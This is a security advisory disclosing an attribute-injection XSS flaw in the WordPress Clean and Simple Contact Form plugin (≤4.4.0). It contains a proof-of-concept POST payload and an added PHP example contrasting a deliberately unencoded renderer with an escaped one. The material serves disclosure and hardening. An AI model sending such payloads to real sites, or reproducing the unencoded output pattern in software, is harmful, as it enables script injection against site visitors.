WordPress Clean And Simple Contact Form 4.4.0 XSS

2014-11-04T00:00:00
ID PACKETSTORM:128957
Type packetstorm
Reporter Ajin Abraham
Modified 2014-11-04T00:00:00

Description

                                        
                                            `Author : Ajin Abraham  
Author Website: http://opensecurity.in  
  
Affected Product: WordPress Clean and Simple Contact Form  
Affected Version: <= 4.4.0  
Vendor: Meg Nicholas  
Vendor URL:  
http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/  
WP Plugin URL:  
https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/  
  
PoC:  
  
Make a POST request to the page containing the contact form generated by  
"Clean and Simple Contact Form"  
with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x="  
  
POST http://localhost/contact-us/  
cscf[name]=" onfocus=alert(1) autofocus x="  
  
  
  
*Regards,Ajin*  
`
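
The PoC value starts with a double quote, which is what lets it end a quoted attribute and add attributes of its own. The following is an added example, not code from the advisory or from the plugin: it assumes the form writes the submitted name back into a `value="..."` attribute, and the function names `render_name_unsafe`, `render_name_safe` and `input_attributes` are hypothetical. It needs PHP's DOM extension.

```php
<?php
// Added example: hypothetical renderers, not the plugin's actual code.

// Constructed sample input: the cscf[name] value given in the PoC.
$submitted = '" onfocus=alert(1) autofocus x="';

// Vulnerable pattern (assumed): the submitted value is written back into a
// double-quoted attribute without encoding, so a '"' ends the attribute.
function render_name_unsafe(string $name): string
{
    return '<input type="text" name="cscf[name]" value="' . $name . '">';
}

// Hardened pattern: encode for the attribute context before output.
// Inside WordPress the equivalent call is esc_attr($name).
function render_name_safe(string $name): string
{
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="cscf[name]" value="' . $encoded . '">';
}

// Parse the markup and list the attribute names that end up on the <input>.
function input_attributes(string $html): array
{
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

$cases = [
    'unsafe' => render_name_unsafe($submitted),
    'safe'   => render_name_safe($submitted),
];
foreach ($cases as $label => $html) {
    echo $label, ': ', $html, PHP_EOL;
    echo '  attributes seen by parser: ',
        implode(', ', input_attributes($html)), PHP_EOL;
}
```

With the encoded output the parser sees only the attributes the template wrote; any attribute beyond `type`, `name` and `value` in the unencoded output came from the request body.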